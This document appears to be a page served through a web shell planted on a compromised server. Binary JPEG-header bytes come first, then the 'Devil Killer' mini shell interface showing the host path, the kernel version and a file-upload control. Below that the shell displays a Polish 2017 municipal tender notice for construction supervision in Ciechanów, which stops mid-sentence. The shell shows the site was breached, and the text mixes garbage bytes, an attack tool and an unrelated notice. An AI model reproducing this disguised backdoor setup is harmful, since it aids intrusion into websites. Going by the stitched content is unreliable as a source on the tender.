JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170414/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170414/67147-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.bip.umiechanow.pl' target='_blank'>http://www.bip.umiechanow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 67147 - 2017
              z dnia 2017-04-14 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Ciechanów: Część 1: Nadzór inwestorski nad przebudową ulicy Sienkiewicza w Ciechanowie 
w ramach zadania pn.: 
Stworzenie warunków do wykorzystania transportu multimodalnego przez budowę w rejonie dworca kolejowego w Ciechanowie drogowo  kolejowego węzła przesiadkowego wraz  z przebudową ulicy Sienkiewicza (droga dojazdowa do dworca PKP) i rozbudową sieci dróg dla rowerów "
Część 2: Nadzór inwestorski nad budową drogowo  kolejowego węzła przesiadkowego, targowiska miejskiego okresowego i hali targowej 
z infrastrukturą położonych przy ul. Sienkiewicza w Ciechanowie.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Miejska Ciechanów reprezentowana przez Prezydenta Miasta Ciechanów, krajowy numer identyfikacyjny
              13037782400000, ul.
              Plac Jana Pawła II 
              6,
              06400  
              Ciechanów, woj.
              mazowieckie, państwo
              Polska, tel.
              236 749 200, e-mail
              umciech@ci.onet.pl, faks
              23 672 29 63.
              <br />
              Adres strony internetowej (URL): www.bip.umciechanow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.umiechanow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />za pośrednictwem operatora pocztowego, osobiście<br />
                Adres:
                <br />Urząd Miasta Ciechanów, ul. Wodna 1, 06-400 Ciechanów</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Część 1: Nadzór inwestorski nad przebudową ulicy Sienkiewicza w Ciechanowie 
w ramach zadania pn.: 
Stworzenie warunków do wykorzystania transportu multimodalnego przez budowę w rejonie dworca kolejowego w Ciechanowie drogowo  kolejowego węzła przesiadkowego wraz  z przebudową ulicy Sienkiewicza (droga dojazdowa do dworca PKP) i rozbudową sieci dróg dla rowerów "
Część 2: Nadzór inwestorski nad budową drogowo  kolejowego węzła przesiadkowego, targowiska miejskiego okresowego i hali targowej 
z infrastrukturą położonych przy ul. Sienkiewicza w Ciechanowie.
<br /><b>Numer referencyjny: </b>WZPI-ZP.271.1.5.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Część 1: Nadzór inwestorski nad przebudową ulicy Sienkiewicza w Ciechanowie w ramach zadania pn.: Stworzenie warunków do wykorzystania transportu multimodalnego przez budowę w rejonie dworca kolejowego w Ciechanowie drogowo  kolejowego węzła przesiadkowego wraz  z przebudową ulicy Sienkiewicza (droga dojazdowa do dworca PKP) i rozbudową sieci dróg dla rowerów "

Miejsce wykonywania nadzoru inwestorskiego: obszar pasa drogowego ulicy Henryka Sienkiewicza w Ciechanowie od skrzyżowania z ul. Płocką do skrzyżowana 
z ul. 17-Stycznia

Część 2: Nadzór inwestorski nad budową drogowo  kolejowego węzła przesiadkowego, targowiska miejskiego okresowego i hali targowej  z infrastrukturą położonych przy ul. Sienkiewicza w Ciechanowie.
	Zadanie I: Budowa targowiska miejskiego okresowego w Ciechanowie przy ul. Sienkiewicza 
	Zadanie II: Budowa drogowo-kolejowego węzła przesiadkowego - podetap 1. 
	Zadanie III: Budowa hali targowej z infrastrukturą. 
	Zadanie IV: Przebudowa placu przed dworcem kolejowym przy ul. Sienkiewicza w Ciechanowie. Budowa drogowo-kolejowego węzła przesiadkowego - podetap 2. 

Miejsce wykonywania nadzoru inwestorskiego: teren placu targowiska miejskiego 
i obszaru miejskiego, na którym znajduje się pętla autobusowa przed dworcem kolejowym.
<br /><br /><b>II.5) Główny kod CPV: </b>71247000-1<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                tak
                <br />
                Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp:
                Zamawiający przewiduje udzielenia zamówień podobnych, o których mowa
w art. 67 ust. 1 pkt 6) ustawy Pzp. Wartość tych zamówień została uwzględniona przy obliczaniu wartości zamówienia.
<br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/01/2018<br /></div><div style="padding-left: 20px">
                    data zakończenia: 31/05/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisywania tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisywania tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	zdolności technicznej lub zawodowej w zakresie doświadczenia Wykonawcy:

Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował:

Część 1: co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami drogowymi o wartości robót min. 6 000 000,00 zł brutto (słownie: sześć milionów złotych)

Część 2: co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami konstrukcyjno  budowlanymi 
i drogowymi o wartości robót min. 10 000 000,00 zł brutto (słownie: dziesięć milionów złotych)

W przypadku składania ofert na Część 1 i Część 2 Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował  co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami drogowymi o wartości robót min. 6 000 000,00 zł brutto (słownie: sześć milionów złotych) oraz co najmniej jedną usługę polegające na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami konstrukcyjno  budowlanymi i drogowymi o wartości robót min. 10 000 000,00 zł brutto (słownie: dziesięć milionów złotych)

 
b)	zdolności technicznej lub zawodowej w zakresie potencjału osób skierowanych przez Wykonawcę do realizacji zamówienia: 
Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają odpowiednie kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonywania zamówienia, w tym:

Część 1:
	Inżynier Kontraktu  (1 osoba), min. 3 lata doświadczenia w samodzielnym wykonywaniu lub nadzorowaniu inwestycji budowlanych, doświadczenie na kierowniczych stanowiskach w nadzorze (Inżynier, Inżynier Rezydent, zastępca Inż. Rezydenta) na co najmniej 2-ch kontraktach obejmujących budowę lub przebudowę dróg w tym na co najmniej jednym kontrakcie o wartości min. 6,0 mln zł.
	Inspektor Nadzoru (branża drogowa)  min. 3 lata doświadczenia zawodowego 
w wykonawstwie robót drogowych lub nadzorach inwestorskich 
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża elektro-energetyczna) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży elektroenergetycznej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności elektro-energetycznej 
w zakresie sieci i instalacji elektrycznych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża sanitarna) - min. 3 lata doświadczenia zawodowego 
w pełnieniu nadzoru nad robotami branży sanitarnej i gazowej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjno-instalacyjnej w zakresie sieci i instalacji sanitarnych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.

UWAGA:
Zamawiający dopuszcza łączenie funkcji Inżyniera Kontraktu z funkcją Inspektora Nadzoru Inwestorskiego, pod warunkiem wykazania się niezbędnym doświadczeniem i uprawnieniami dla Inżyniera Kontraktu oraz Inspektora Nadzoru Inwestorskiego.


Część 2:
	Inżynier Kontraktu - (1 osoba), min. 3 lata doświadczenia w samodzielnym wykonywaniu lub nadzorowaniu inwestycji budowlanych, doświadczenie na kierowniczych stanowiskach w nadzorze (Inżynier, Inżynier Rezydent, zastępca Inż. Rezydenta) na co najmniej 2-ch kontraktach obejmujących budowę lub przebudowę dróg w tym na co najmniej jednym kontrakcie o wartości min. 
10,0 mln zł.
	Inspektor Nadzoru (branża drogowa)  min. 3 lata doświadczenia zawodowego 
w wykonawstwie robót  drogowych lub nadzorach inwestorskich 
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża elektro-energetyczna) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży elektroenergetycznej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności elektro-energetycznej 
w zakresie sieci i instalacji elektrycznych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża sanitarna) - min. 3 lata doświadczenia zawodowego 
w pełnieniu nadzoru nad robotami branży sanitarnej i gazowej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjno-instalacyjnej w zakresie sieci i instalacji sanitarnych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża konstrukcyjno  budowlana) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży konstrukcyjno-budowlanej.
Minimum jedna osoba, która będzie inspektorem nadzoru inwestorskiego robót konstrukcyjno-budowlanych posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.

UWAGA:
Zamawiający dopuszcza łączenie funkcji Inżyniera Kontraktu z funkcją Inspektora Nadzoru Inwestorskiego, pod warunkiem wykazania się niezbędnym doświadczeniem i uprawnieniami dla Inżyniera Kontraktu oraz Inspektora Nadzoru Inwestorskiego.


<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp;
2)	oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej Wykonawca może  złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował:

Część 1: co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami drogowymi o wartości robót min. 6 000 000,00 zł brutto (słownie: sześć milionów złotych)

Część 2: co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami konstrukcyjno  budowlanymi 
i drogowymi o wartości robót min. 10 000 000,00 zł brutto (słownie: dziesięć milionów złotych)

W przypadku składania ofert na Część 1 i Część 2 Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizował  co najmniej jedną usługę polegającą na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami drogowymi o wartości robót min. 6 000 000,00 zł brutto (słownie: sześć milionów złotych) oraz co najmniej jedną usługę polegające na sprawowaniu samodzielnej funkcji technicznej dotyczącej nadzoru nad robotami konstrukcyjno  budowlanymi i drogowymi o wartości robót min. 10 000 000,00 zł brutto (słownie: dziesięć milionów złotych)

Wykonawca wykaże, iż osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają odpowiednie kwalifikacje zawodowe, uprawnienia, doświadczenie i wykształcenie niezbędne do wykonywania zamówienia, w tym:

Część 1:
	Inżynier Kontraktu  (1 osoba), min. 3 lata doświadczenia w samodzielnym wykonywaniu lub nadzorowaniu inwestycji budowlanych, doświadczenie na kierowniczych stanowiskach w nadzorze (Inżynier, Inżynier Rezydent, zastępca Inż. Rezydenta) na co najmniej 2-ch kontraktach obejmujących budowę lub przebudowę dróg w tym na co najmniej jednym kontrakcie o wartości min. 6,0 mln zł.
	Inspektor Nadzoru (branża drogowa)  min. 3 lata doświadczenia zawodowego 
w wykonawstwie robót drogowych lub nadzorach inwestorskich 
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności drogowej lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża elektro-energetyczna) - min. 3 lata doświadczenia zawodowego w pełnieniu nadzoru nad robotami branży elektroenergetycznej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności elektro-energetycznej 
w zakresie sieci i instalacji elektrycznych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.
	Inspektor Nadzoru (branża sanitarna) - min. 3 lata doświadczenia zawodowego 
w pełnieniu nadzoru nad robotami branży sanitarnej i gazowej
Minimum jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń w specjalności inżynieryjno-instalacyjnej w zakresie sieci i instalacji sanitarnych lub odpowiadające im wyższe uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa lub równoważne.

UWAGA:
Zamawiający dopuszcza łączenie funkcji Inżyniera Kontraktu z funkcją Inspektora Nadzoru Inwestorskiego, pod warunkiem wykazania się niezbędnym doświadczeniem 
i uprawnieniami dla Inżyniera Kontraktu oraz Inspektora Nadzoru Inwestorskiego.

Część 2:
	Inżynier Kontraktu - (1 osoba), min. 3 lata doświadczenia w samodzielnym wykonywaniu lub nadzorowaniu inwestycji budowlanych, doświadczenie na kierowniczych stanowiskach w nadzorze (Inżynier, Inżynier Rezydent, zastępca Inż. Rezydenta) na co najmniej 2-ch kontraktach obejmujących budowę lub przebudowę dróg w tym na co najmniej jednym kontrakcie o wartości min. 
